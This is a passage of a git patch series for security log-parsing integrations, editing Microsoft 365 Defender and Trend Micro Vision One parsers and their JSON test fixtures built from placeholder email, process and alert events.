subject\",\"EmailDirection\":\"Inbound\",\"DeliveryAction\":\"Delivered\",\"DeliveryLocation\":\"Inbox/folder\",\"EmailAction\":null,\"EmailActionPolicy\":null,\"EmailActionPolicyGuid\":null,\"AttachmentCount\":0,\"UrlCount\":0,\"EmailLanguage\":\"en\",\"RecipientObjectId\":\"abcd1234-abcd-1234-ef90-123456abcdef\",\"SenderObjectId\":null,\"SenderDisplayName\":null,\"ThreatNames\":null,\"ThreatTypes\":null,\"DetectionMethods\":null,\"Connectors\":\"Relai SMTP interne\",\"OrgLevelAction\":\"Allow\",\"OrgLevelPolicy\":\"Connection policy\",\"UserLevelAction\":null,\"UserLevelPolicy\":null,\"ConfidenceLevel\":null,\"AdditionalFields\":null,\"AuthenticationDetails\":\"{\\\"SPF\\\":\\\"pass\\\",\\\"DKIM\\\":\\\"none\\\",\\\"DMARC\\\":\\\"pass\\\"}\",\"BulkComplaintLevel\":null},\"Tenant\":\"DefaultTenant\"}", + "event": { + "action": "Delivered", + "category": [ + "connection", + "email" + ], + "dataset": "email_events", + "type": [ + "allowed", + "info" + ] + }, + "@timestamp": "2024-10-28T14:18:40Z", + "action": { + "properties": { + "AttachmentCount": 0, + "AuthenticationDetails": "{\"DKIM\": \"none\", \"DMARC\": \"pass\", \"SPF\": \"pass\"}", + "Connectors": "Relai SMTP interne", + "DeliveryAction": "Delivered", + "DeliveryLocation": "Inbox/folder", + "EmailClusterId": "3162398878", + "EmailDirection": "Inbound", + "EmailLanguage": "en", + "OrgLevelAction": "Allow", + "OrgLevelPolicy": "Connection policy", + "RecipientObjectId": "abcd1234-abcd-1234-ef90-123456abcdef", + "SenderFromDomain": "company.com", + "UrlCount": 0 + } + }, + "email": { + "direction": "inbound", + "from": { + "address": [ + "john.doe@company.com" + ] + }, + "local_id": "12345678-1234-abcd-ef90-abcdef123456", + "message_id": "<1@eu-west-1.test.com>", + "subject": "MAIL subject", + "to": { + "address": [ + "alan.smithee@company.com" + ] + } + }, + "microsoft": { + "defender": { + "report": { + "id": "12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c" + } + } + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_email_delivered2.json b/Microsoft/microsoft-365-defender/tests/test_email_delivered2.json new file mode 100644 index 000000000..d3b7b8c2f --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_email_delivered2.json @@ -0,0 +1,76 @@ +{ + "input": { + "message": "{\"time\":\"2024-10-28T14:39:28.9769628Z\",\"tenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-EmailEvents\",\"_TimeReceivedBySvc\":\"2024-10-28T14:18:38.5006358Z\",\"properties\":{\"ReportId\":\"12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c\",\"NetworkMessageId\":\"12345678-1234-abcd-ef90-abcdef123456\",\"InternetMessageId\":\"<20241028141819.43623347A8F@test.fr>\",\"Timestamp\":\"2024-10-28T14:18:38Z\",\"EmailClusterId\":2633942188,\"SenderIPv4\":\"1.2.3.4\",\"SenderIPv6\":null,\"SenderMailFromAddress\":\"john.doe@test.fr\",\"SenderFromAddress\":\"john.doe@test.fr\",\"SenderMailFromDomain\":\"test.fr\",\"SenderFromDomain\":\"test.fr\",\"RecipientEmailAddress\":\"alan.smithee@test.fr\",\"Subject\":\"EMAIL Subject\",\"EmailDirection\":\"Inbound\",\"DeliveryAction\":\"Delivered\",\"DeliveryLocation\":\"Inbox/folder\",\"EmailAction\":null,\"EmailActionPolicy\":null,\"EmailActionPolicyGuid\":null,\"AttachmentCount\":0,\"UrlCount\":0,\"EmailLanguage\":\"en\",\"RecipientObjectId\":\"abcd1234-abcd-1234-ef90-123456abcdef\",\"SenderObjectId\":null,\"SenderDisplayName\":null,\"ThreatNames\":null,\"ThreatTypes\":null,\"DetectionMethods\":null,\"Connectors\":\"Relai SMTP interne\",\"OrgLevelAction\":\"Allow\",\"OrgLevelPolicy\":\"Connection policy\",\"UserLevelAction\":null,\"UserLevelPolicy\":null,\"ConfidenceLevel\":null,\"AdditionalFields\":null,\"AuthenticationDetails\":\"{\\\"SPF\\\":\\\"pass\\\",\\\"DKIM\\\":\\\"none\\\",\\\"DMARC\\\":\\\"pass\\\"}\",\"BulkComplaintLevel\":null},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": "{\"time\":\"2024-10-28T14:39:28.9769628Z\",\"tenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-EmailEvents\",\"_TimeReceivedBySvc\":\"2024-10-28T14:18:38.5006358Z\",\"properties\":{\"ReportId\":\"12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c\",\"NetworkMessageId\":\"12345678-1234-abcd-ef90-abcdef123456\",\"InternetMessageId\":\"<20241028141819.43623347A8F@test.fr>\",\"Timestamp\":\"2024-10-28T14:18:38Z\",\"EmailClusterId\":2633942188,\"SenderIPv4\":\"1.2.3.4\",\"SenderIPv6\":null,\"SenderMailFromAddress\":\"john.doe@test.fr\",\"SenderFromAddress\":\"john.doe@test.fr\",\"SenderMailFromDomain\":\"test.fr\",\"SenderFromDomain\":\"test.fr\",\"RecipientEmailAddress\":\"alan.smithee@test.fr\",\"Subject\":\"EMAIL Subject\",\"EmailDirection\":\"Inbound\",\"DeliveryAction\":\"Delivered\",\"DeliveryLocation\":\"Inbox/folder\",\"EmailAction\":null,\"EmailActionPolicy\":null,\"EmailActionPolicyGuid\":null,\"AttachmentCount\":0,\"UrlCount\":0,\"EmailLanguage\":\"en\",\"RecipientObjectId\":\"abcd1234-abcd-1234-ef90-123456abcdef\",\"SenderObjectId\":null,\"SenderDisplayName\":null,\"ThreatNames\":null,\"ThreatTypes\":null,\"DetectionMethods\":null,\"Connectors\":\"Relai SMTP interne\",\"OrgLevelAction\":\"Allow\",\"OrgLevelPolicy\":\"Connection policy\",\"UserLevelAction\":null,\"UserLevelPolicy\":null,\"ConfidenceLevel\":null,\"AdditionalFields\":null,\"AuthenticationDetails\":\"{\\\"SPF\\\":\\\"pass\\\",\\\"DKIM\\\":\\\"none\\\",\\\"DMARC\\\":\\\"pass\\\"}\",\"BulkComplaintLevel\":null},\"Tenant\":\"DefaultTenant\"}", + "event": { + "action": "Delivered", + "category": [ + "connection", + "email" + ], + "dataset": "email_events", + "type": [ + "allowed", + "info" + ] + }, + "@timestamp": "2024-10-28T14:18:38Z", + "action": { + "properties": { + "AttachmentCount": 0, + "AuthenticationDetails": "{\"DKIM\": \"none\", \"DMARC\": \"pass\", \"SPF\": \"pass\"}", + "Connectors": "Relai SMTP interne", + "DeliveryAction": "Delivered", + "DeliveryLocation": "Inbox/folder", + "EmailClusterId": "2633942188", + "EmailDirection": "Inbound", + "EmailLanguage": "en", + "OrgLevelAction": "Allow", + "OrgLevelPolicy": "Connection policy", + "RecipientObjectId": "abcd1234-abcd-1234-ef90-123456abcdef", + "SenderFromDomain": "test.fr", + "UrlCount": 0 + } + }, + "email": { + "direction": "inbound", + "from": { + "address": [ + "john.doe@test.fr" + ] + }, + "local_id": "12345678-1234-abcd-ef90-abcdef123456", + "message_id": "<20241028141819.43623347A8F@test.fr>", + "subject": "EMAIL Subject", + "to": { + "address": [ + "alan.smithee@test.fr" + ] + } + }, + "microsoft": { + "defender": { + "report": { + "id": "12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c" + } + } + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + } + } +} \ No newline at end of file From 94649a4b22251fe173eb508355223e3f8e67a851 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Fri, 22 Nov 2024 12:16:03 +0100 Subject: [PATCH 69/84] Enhanced smart descriptions --- .../_meta/smart-descriptions.json | 11 +++++++++++ 1 file changed, 11 insertions(+) diff --git a/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json b/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json index 6232e66f8..2d1728daa 100644 --- a/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json +++ b/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json @@ -9,6 +9,17 @@ { "field": "action.type" } ] }, + { + "value": "New {action.type} incident received: {microsoft.defender.investigation.name}", + "conditions": [ + { + "field": "event.dataset", + "value": "cloud_app_events" + }, + { "field": "action.type" }, + { "field": "microsoft.defender.investigation.name" } + ] + }, { "value": "New incident {microsoft.defender.investigation.name}: {email.attachments.file.name} with hash {email.attachments.file.hash.sha256}", "conditions": [ From 1bb05b973e9cb21fae745b7ce6eabd0f184a55eb Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Fri, 22 Nov 2024 13:55:16 +0100 Subject: [PATCH 70/84] Deleted device_events exceptions --- .../microsoft-365-defender/ingest/parser.yml | 4 +- ...test_device_event_sensitive_file_read.json | 81 +++++++++---------- .../tests/test_device_events_2.json | 11 ++- ..._device_events_shell_link_create_file.json | 74 +++++++++-------- .../tests/test_device_process_created.json | 8 +- .../test_devices_events_script_content.json | 11 ++- 6 files changed, 91 insertions(+), 98 deletions(-) diff --git a/Microsoft/microsoft-365-defender/ingest/parser.yml b/Microsoft/microsoft-365-defender/ingest/parser.yml index f60d9b6f0..0a33f577f 100644 --- a/Microsoft/microsoft-365-defender/ingest/parser.yml +++ b/Microsoft/microsoft-365-defender/ingest/parser.yml @@ -41,9 +41,9 @@ pipeline: output_field: "data" - name: set_common_fields - name: set_process_events - filter: '{{json_event.message.get("category") not in ["AdvancedHunting-DeviceProcessEvents", "AdvancedHunting-DeviceEvents"] or (json_event.message.get("category") == "AdvancedHunting-DeviceEvents" and json_event.message.properties.get("ActionType").lower() in ["antivirusscancancelled", "antivirusscancompleted", "antivirusscanfailed", "appcontrolpolicyapplied", "appguardbrowsetourl", "appguardcreatecontainer", "appguardlaunchedwithurl", "appguardresumecontainer", "auditpolicymodification", "browserlaunchedtoopenurl", "clrunbackedmoduleloaded", "controlflowguardviolation", "createremotethreadapicall", "dnsqueryresponse", "dpapiaccessed", "exploitguardacgenforced", "exploitguardwin32systemcallblocked", "getasynckeystateapicall", "getclipboarddata", "ldapsearch", "memoryremoteprotect", "namedpipeevent", "ntallocatevirtualmemoryapicall", "ntallocatevirtualmemoryremoteapicall", "ntmapviewofsectionremoteapicall", "ntprotectvirtualmemoryapicall","otheralertrelatedactivity", "powershellcommand", "processprimarytokenmodified", "screenshottaken", "smartscreenurlwarning", "writetolsassprocessmemory"])}}' + filter: '{{json_event.message.get("category") != "AdvancedHunting-DeviceProcessEvents"}}' - name: set_process_deviceprocess_events - filter: '{{json_event.message.get("category") == "AdvancedHunting-DeviceProcessEvents" or (json_event.message.get("category") == "AdvancedHunting-DeviceEvents" and json_event.message.properties.get("ActionType").lower() not in ["antivirusscancancelled", "antivirusscancompleted", "antivirusscanfailed", "appcontrolpolicyapplied", "appguardbrowsetourl", "appguardcreatecontainer", "appguardlaunchedwithurl", "appguardresumecontainer", "auditpolicymodification", "browserlaunchedtoopenurl", "clrunbackedmoduleloaded", "controlflowguardviolation", "createremotethreadapicall", "dnsqueryresponse", "dpapiaccessed", "exploitguardacgenforced", "exploitguardwin32systemcallblocked", "getasynckeystateapicall", "getclipboarddata", "ldapsearch", "memoryremoteprotect", "namedpipeevent", "ntallocatevirtualmemoryapicall", "ntallocatevirtualmemoryremoteapicall", "ntmapviewofsectionremoteapicall", "ntprotectvirtualmemoryapicall","otheralertrelatedactivity", "powershellcommand", "processprimarytokenmodified", "screenshottaken", "smartscreenurlwarning", "writetolsassprocessmemory"])}}' + filter: '{{json_event.message.get("category") == "AdvancedHunting-DeviceProcessEvents"}}' - name: set_alert_evidence_fields filter: '{{json_event.message.get("category") == "AdvancedHunting-AlertEvidence"}}' - name: set_alert_info_fields diff --git a/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json b/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json index fedd99aea..413d002c1 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json @@ -24,18 +24,16 @@ "properties": { "AccountSid": "S-1-2-3", "process": { - "parent": { - "AccountObjectId": "12345678-abcd-1234-ef09-abcdef123456", - "CommandLine": "\"Browser.exe\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0", - "FileSize": 3316224, - "LogonId": "5223047", - "VersionInfoCompanyName": "Test Corporation", - "VersionInfoFileDescription": "Browser EXE", - "VersionInfoInternalFileName": "Browser.EXE", - "VersionInfoOriginalFileName": "Browser.EXE", - "VersionInfoProductName": "Test Product", - "VersionInfoProductVersion": "1, 0, 0, 1" - } + "AccountObjectId": "12345678-abcd-1234-ef09-abcdef123456", + "CommandLine": "\"Browser.exe\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0", + "FileSize": 3316224, + "LogonId": "5223047", + "VersionInfoCompanyName": "Test Corporation", + "VersionInfoFileDescription": "Browser EXE", + "VersionInfoInternalFileName": "Browser.EXE", + "VersionInfoOriginalFileName": "Browser.EXE", + "VersionInfoProductName": "Test Product", + "VersionInfoProductVersion": "1, 0, 0, 1" } }, "type": "SensitiveFileRead" @@ -57,37 +55,38 @@ } }, "process": { - "name": "FileName.mdb", + "args": [ + "/DBMode", + "/Network", + "/ProjectID", + "/Ticket", + "0", + "0", + "12345678-1234-5678-9012-345678901234", + "123456789" + ], + "command_line": "\"Browser.exe\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0", + "executable": "c:\\program files (x86)\\browser.exe", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", + "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + }, + "name": "browser.exe", "parent": { - "args": [ - "/DBMode", - "/Network", - "/ProjectID", - "/Ticket", - "0", - "0", - "12345678-1234-5678-9012-345678901234", - "123456789" - ], - "command_line": "\"Browser.exe\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0", - "executable": "c:\\program files (x86)\\browser.exe", - "hash": { - "md5": "51a9cac9c4e8da44ffd7502be17604ee", - "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", - "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" - }, - "name": "browser.exe", - "pid": 1328, - "start": "2024-11-12T10:17:23.990532Z", - "user": { - "domain": "company", - "email": "USERNAME@COMPANY.COM", - "id": "S-1-2-3", - "name": "username" - }, - "working_directory": "c:\\program files (x86)" + "name": "Windows.exe", + "pid": 1820, + "start": "2024-10-14T05:47:54.324381Z" + }, + "pid": 1328, + "start": "2024-11-12T10:17:23.990532Z", + "user": { + "domain": "company", + "email": "USERNAME@COMPANY.COM", + "id": "S-1-2-3", + "name": "username" }, - "working_directory": "C:" + "working_directory": "c:\\program files (x86)" }, "related": { "hash": [ diff --git a/Microsoft/microsoft-365-defender/tests/test_device_events_2.json b/Microsoft/microsoft-365-defender/tests/test_device_events_2.json index 494baa569..4964dae1f 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_events_2.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_events_2.json @@ -17,9 +17,7 @@ "action": { "properties": { "process": { - "parent": { - "LogonId": "0" - } + "LogonId": "0" } }, "type": "ScriptContent" @@ -42,9 +40,10 @@ }, "process": { "parent": { - "pid": 417271, - "start": "2024-10-22T15:09:08.624070Z" - } + "pid": 0 + }, + "pid": 417271, + "start": "2024-10-22T15:09:08.624070Z" }, "related": { "hash": [ diff --git a/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json b/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json index 37a646715..48696c644 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json @@ -23,18 +23,16 @@ "action": { "properties": { "process": { - "parent": { - "AccountObjectId": "abcdef90-1234-abcd-5678-abcdef123456", - "CommandLine": "\"WINWORD.EXE\" /n \"I:\\COMPANY\\Service\\FILE.doc\" /o \"\"", - "FileSize": 1621656, - "LogonId": "8066492", - "VersionInfoCompanyName": "Microsoft Corporation", - "VersionInfoFileDescription": "Microsoft Word", - "VersionInfoInternalFileName": "WinWord", - "VersionInfoOriginalFileName": "WinWord.exe", - "VersionInfoProductName": "Microsoft Office", - "VersionInfoProductVersion": "16.0.17928.20216" - } + "AccountObjectId": "abcdef90-1234-abcd-5678-abcdef123456", + "CommandLine": "\"WINWORD.EXE\" /n \"I:\\COMPANY\\Service\\FILE.doc\" /o \"\"", + "FileSize": 1621656, + "LogonId": "8066492", + "VersionInfoCompanyName": "Microsoft Corporation", + "VersionInfoFileDescription": "Microsoft Word", + "VersionInfoInternalFileName": "WinWord", + "VersionInfoOriginalFileName": "WinWord.exe", + "VersionInfoProductName": "Microsoft Office", + "VersionInfoProductVersion": "16.0.17928.20216" } }, "type": "ShellLinkCreateFileEvent" @@ -60,34 +58,34 @@ } }, "process": { - "name": "FILENAME.LNK", + "args": [ + "\"\"", + "\"I:\\COMPANY\\Service\\FILE.doc\"", + "/n", + "/o" + ], + "command_line": "\"WINWORD.EXE\" /n \"I:\\COMPANY\\Service\\FILE.doc\" /o \"\"", + "executable": "c:\\program files (x86)\\microsoft office\\root\\office16\\winword.exe", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", + "sha256": "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323" + }, + "name": "winword.exe", "parent": { - "args": [ - "\"\"", - "\"I:\\COMPANY\\Service\\FILE.doc\"", - "/n", - "/o" - ], - "command_line": "\"WINWORD.EXE\" /n \"I:\\COMPANY\\Service\\FILE.doc\" /o \"\"", - "executable": "c:\\program files (x86)\\microsoft office\\root\\office16\\winword.exe", - "hash": { - "md5": "51a9cac9c4e8da44ffd7502be17604ee", - "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", - "sha256": "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323" - }, - "name": "winword.exe", - "pid": 20948, - "start": "2024-11-12T10:02:28.777910Z", - "user": { - "domain": "company", - "email": "JOHNDOE@COMPANY.COM", - "id": "S-1-2-3", - "name": "jdoe" - }, - "working_directory": "c:\\program files (x86)\\microsoft office\\root\\office16" + "name": "explorer.exe", + "pid": 14616, + "start": "2024-11-12T08:47:41.952077Z" + }, + "pid": 20948, + "start": "2024-11-12T10:02:28.777910Z", + "user": { + "domain": "company", + "email": "JOHNDOE@COMPANY.COM", + "id": "S-1-2-3", + "name": "jdoe" }, - "start": "2024-11-06T16:05:23.113802Z", - "working_directory": "C:\\Users\\jdoe\\AppData\\Roaming\\Microsoft\\Office" + "working_directory": "c:\\program files (x86)\\microsoft office\\root\\office16" }, "related": { "hash": [ diff --git a/Microsoft/microsoft-365-defender/tests/test_device_process_created.json b/Microsoft/microsoft-365-defender/tests/test_device_process_created.json index 7acf31f01..cd2ca7981 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_process_created.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_process_created.json @@ -29,11 +29,9 @@ } }, "process": { - "parent": { - "user": { - "domain": "autorite nt", - "name": "syst\u00e8me" - } + "user": { + "domain": "autorite nt", + "name": "syst\u00e8me" } } } diff --git a/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json b/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json index 72f93da4e..c632ebbfa 100644 --- a/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json +++ b/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json @@ -17,9 +17,7 @@ "action": { "properties": { "process": { - "parent": { - "LogonId": "0" - } + "LogonId": "0" } }, "type": "ScriptContent" @@ -42,9 +40,10 @@ }, "process": { "parent": { - "pid": 423638, - "start": "2024-10-22T15:09:47.165481Z" - } + "pid": 0 + }, + "pid": 423638, + "start": "2024-10-22T15:09:47.165481Z" }, "related": { "hash": [ From 3c5af0dd65f309e8d14b9d0a538745160ca82713 Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Mon, 25 Nov 2024 12:09:53 +0200 Subject: [PATCH 71/84] Fixes and improvements --- .../trend-micro-vision-one/_meta/manifest.yml | 2 +- Trend Micro/trend-micro-vision-one/ingest/parser.yml | 10 ++++++++-- .../tests/test_internal_network_scanner.json | 8 +++----- .../trend-micro-vision-one/tests/test_process.json | 12 ++++++++---- .../trend-micro-vision-one/tests/test_registry.json | 12 +++++++----- 5 files changed, 27 insertions(+), 17 deletions(-) diff --git a/Trend Micro/trend-micro-vision-one/_meta/manifest.yml b/Trend Micro/trend-micro-vision-one/_meta/manifest.yml index 8363b7b96..da8360194 100644 --- a/Trend Micro/trend-micro-vision-one/_meta/manifest.yml +++ b/Trend Micro/trend-micro-vision-one/_meta/manifest.yml @@ -1,7 +1,7 @@ uuid: 9844ea0a-de7f-45d4-9a9b-b07651f0630e automation_connector_uuid: 7aa5dd7c-d694-44dd-b605-66b7974dfb05 automation_module_uuid: 1b02d442-b804-4987-afe7-6a4be6ef35e6 -name: Trend Micro Vision One +name: Trend Micro Vision One [BETA] slug: trend-micro-vision-one description: >- diff --git a/Trend Micro/trend-micro-vision-one/ingest/parser.yml b/Trend Micro/trend-micro-vision-one/ingest/parser.yml index a13ee54b2..3446a59f6 100644 --- a/Trend Micro/trend-micro-vision-one/ingest/parser.yml +++ b/Trend Micro/trend-micro-vision-one/ingest/parser.yml @@ -25,8 +25,6 @@ stages: - set: "@timestamp": "{{parsed_event.message.createdDateTime}}" - organization.name: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'account') | first).entityValue }}" - organization.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'account') | first).entityId }}" host.name: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'host') | first).entityValue.name }}" host.ip: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'host') | first).entityValue.ips }}" @@ -39,6 +37,14 @@ stages: event.url: "{{parsed_event.message.model.workbenchLink}}" + - set: + user.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'account') | first).entityValue }}" + + - set: + user.name: "{{final.user.id.split('\\\\')[0]}}" + user.domain: "{{final.user.id.split('\\\\')[1]}}" + filter: "{{final.user.id != null}}" + - set: process.command_line: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processCmd') | first).value }}" process.parent.command_line: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'parentCmd') | first).value }}" diff --git a/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json b/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json index e6bcf0088..769477b65 100644 --- a/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json +++ b/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json @@ -3,7 +3,7 @@ "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=7ddf32e17a6ac5ce04a8ecbf782ca509\", \"alertProvider\": \"SAE\", \"modelId\": \"fc93e58b-142a-46bd-89b3-0670004728da\", \"model\": \"Internal Network Scanner\", \"modelType\": \"preset\", \"score\": 22, \"severity\": \"low\", \"createdDateTime\": \"2024-07-23T14:46:11Z\", \"updatedDateTime\": \"2024-07-23T14:46:11Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"john\\\\doe\", \"entityId\": \"john\\\\doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"name\": \"doe10\", \"ips\": [\"1.2.3.4\"]}, \"entityId\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"relatedEntities\": [\"john\\\\doe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8], \"provenance\": [\"Sweeping\", \"Alert\"], \"managementScopeGroupId\": \"a008286d-c35c-4b85-85bb-6c744b27c2e7\"}]}, \"description\": \"Detects usage of network scanner to gather information\", \"matchedRules\": [{\"id\": \"1382c167-1c06-4312-89bd-2db0573a0a3e\", \"name\": \"Internal Network Scanning\", \"matchedFilters\": [{\"id\": \"95fa94aa-126d-40a1-92dd-e4427da20897\", \"name\": \"Internal Network Scanning via Famatech Scanner Tools\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"mitreTechniqueIds\": [\"T1046\"], \"matchedEvents\": [{\"uuid\": \"47028c1b-ba5b-45ec-98b0-2f62b8ee1665\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"C:\\\\WINDOWS\\\\Explorer.EXE\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\\\" \", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"file_sha256\", \"field\": \"objectFileHashSha256\", \"value\": \"E665BB196B40DBB0FA91DBB908DB7DA5065BA28DF9F445AD97C17DF180FF43A1\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"B9AB76C0E991FED29CF07956B7B5E758DB91BEF52E4C0FA810FEF88000506631\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"objectFilePath\", \"value\": \"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"user_account\", \"field\": \"logonUser\", \"value\": \"doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Related Asset Enrichment\", \"Alert\"]}, {\"id\": 8, \"type\": \"user_account\", \"field\": \"\", \"value\": \"Syst\\u00e8me\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}]}" }, "expected": { - "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=0c12e642ca5b7ed4436e5f23f568ae10066608d3\", \"alertProvider\": \"SAE\", \"modelId\": \"fc93e58b-142a-46bd-89b3-0670004728da\", \"model\": \"Internal Network Scanner\", \"modelType\": \"preset\", \"score\": 22, \"severity\": \"low\", \"createdDateTime\": \"2024-07-23T14:46:11Z\", \"updatedDateTime\": \"2024-07-23T14:46:11Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"john\\\\doe\", \"entityId\": \"john\\\\doe\", 